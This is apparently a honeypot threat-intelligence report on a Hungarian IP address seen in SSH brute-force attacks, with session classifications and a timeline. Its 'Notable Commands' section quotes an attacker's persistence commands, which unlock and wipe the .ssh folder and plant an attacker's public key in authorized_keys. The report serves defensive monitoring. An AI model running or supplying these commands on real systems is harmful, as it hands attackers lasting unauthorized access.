
195.199.210.194

Threat Confidence: 47%
Location: 🇭🇺 HU / Gyöngyös
ASN: AS1955 · KIFU (Governmental Info Tech Development Agency)
Cloud Provider:
Total Events: 341 (Top 10% by volume)
Agent Count: 1
First / Last Seen: 2026-04-08 00:08 — 2026-04-08 00:52
Attack Types: ssh:bruteforce
MITRE ATT&CK Techniques: Initial Access, Defense Evasion, Credential Access, Command and Control
External Corroboration: Not flagged by any external feeds
Campaigns: Not associated with any campaigns
Session Forensics: malware_dropper ×12, credential_harvester ×25, opportunistic_bruter ×12
Sessions: 49 (24 with login)
Avg Depth Score: 0.55
Commands Executed: 36
Files Downloaded: 12
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Fingerprints
03a80b21afa810682a776a7d42e5e6fb
SSH-2.0-libssh_0.11.1
Evidence Timeline
Opportunistic Bruter 16cf429c7332 w4m_seattle_01 · 2026-04-08 00:52
1 50%
Malware Dropper 6e37e6dac4d9 w4m_seattle_01 · 2026-04-08 00:52
3 1 1 100%
Credential Harvester 9dd8ddbed758 w4m_seattle_01 · 2026-04-08 00:52
1 35%
Credential Harvester c143e52e792c w4m_seattle_01 · 2026-04-08 00:51
1 35%
Credential Harvester 6fe470357280 w4m_seattle_01 · 2026-04-08 00:49
1 35%
Opportunistic Bruter a0f916ab61d5 w4m_seattle_01 · 2026-04-08 00:47
1 50%
Malware Dropper 83903937deb1 w4m_seattle_01 · 2026-04-08 00:47
3 1 1 100%
Credential Harvester 2943afec215c w4m_seattle_01 · 2026-04-08 00:47
1 35%
Malware Dropper 378c75077c3d w4m_seattle_01 · 2026-04-08 00:45
3 1 1 100%
Opportunistic Bruter 022b23b9012b w4m_seattle_01 · 2026-04-08 00:45
1 50%
Credential Harvester 51aac8d23a10 w4m_seattle_01 · 2026-04-08 00:45
1 35%
Credential Harvester ec6ac79d4050 w4m_seattle_01 · 2026-04-08 00:44
1 35%
Opportunistic Bruter 3450e2c218b8 w4m_seattle_01 · 2026-04-08 00:42
1 50%
Malware Dropper 40be93bb457c w4m_seattle_01 · 2026-04-08 00:42
3 1 1 100%
Credential Harvester 46e142b2eb1e w4m_seattle_01 · 2026-04-08 00:42
1 35%
Opportunistic Bruter 9b25e6e0a3eb w4m_seattle_01 · 2026-04-08 00:40
1 50%
Malware Dropper a846d01c7627 w4m_seattle_01 · 2026-04-08 00:40
3 1 1 100%
Credential Harvester 9c68ad8c3393 w4m_seattle_01 · 2026-04-08 00:40
1 35%
Opportunistic Bruter 92b406143920 w4m_seattle_01 · 2026-04-08 00:39
1 50%
Malware Dropper c8c5af2723bf w4m_seattle_01 · 2026-04-08 00:38
3 1 1 100%
Credential Harvester 97fb0a2c076c w4m_seattle_01 · 2026-04-08 00:39
1 35%
Opportunistic Bruter a39ff51a45a9 w4m_seattle_01 · 2026-04-08 00:37
1 50%
Malware Dropper 8017ebbb2b07 w4m_seattle_01 · 2026-04-08 00:37
3 1 1 100%
Credential Harvester 56144f5c4eff w4m_seattle_01 · 2026-04-08 00:37
1 35%
Credential Harvester 9ed193e9884b w4m_seattle_01 · 2026-04-08 00:35
1 35%
Credential Harvester fe881e56cda2 w4m_seattle_01 · 2026-04-08 00:33
1 35%
Malware Dropper 1a336d5b7f46 w4m_seattle_01 · 2026-04-08 00:31
3 1 1 100%
Opportunistic Bruter 402220f42d60 w4m_seattle_01 · 2026-04-08 00:32
1 50%
Credential Harvester d15311103517 w4m_seattle_01 · 2026-04-08 00:31
1 35%
Opportunistic Bruter 80f1e76a4957 w4m_seattle_01 · 2026-04-08 00:30
1 50%
Malware Dropper 8e967cd76f5c w4m_seattle_01 · 2026-04-08 00:30
3 1 1 100%
Credential Harvester e38ad831856e w4m_seattle_01 · 2026-04-08 00:30
1 35%
Credential Harvester d8d027ef9692 w4m_seattle_01 · 2026-04-08 00:28
1 35%
Credential Harvester e1ef58283fb8 w4m_seattle_01 · 2026-04-08 00:26
1 35%
Credential Harvester 1897582838db w4m_seattle_01 · 2026-04-08 00:25
1 35%
Credential Harvester a976af25b0a8 w4m_seattle_01 · 2026-04-08 00:23
1 35%
Credential Harvester 99f54d217684 w4m_seattle_01 · 2026-04-08 00:21
1 35%
Opportunistic Bruter 90c920eea688 w4m_seattle_01 · 2026-04-08 00:19
1 50%
Malware Dropper e34c7fb34c34 w4m_seattle_01 · 2026-04-08 00:19
3 1 1 100%
Credential Harvester 9e51f03570e2 w4m_seattle_01 · 2026-04-08 00:19
1 35%
Credential Harvester a06f6f33467d w4m_seattle_01 · 2026-04-08 00:18
1 35%
Opportunistic Bruter 8ac5910d6427 w4m_seattle_01 · 2026-04-08 00:16
1 50%
Malware Dropper c2aa30a24797 w4m_seattle_01 · 2026-04-08 00:16
3 1 1 100%
Credential Harvester a03c13cc989d w4m_seattle_01 · 2026-04-08 00:16
1 35%
Credential Harvester 17b8893f4b2e w4m_seattle_01 · 2026-04-08 00:14
1 35%
Malware Dropper 9ec76589dea4 w4m_seattle_01 · 2026-04-08 00:13
3 1 1 100%
Opportunistic Bruter b8eee5329db3 w4m_seattle_01 · 2026-04-08 00:13
1 50%
Credential Harvester 13380eabbbc2 w4m_seattle_01 · 2026-04-08 00:13
1 35%
Credential Harvester 21385d36b523 w4m_seattle_01 · 2026-04-08 00:08
1 35%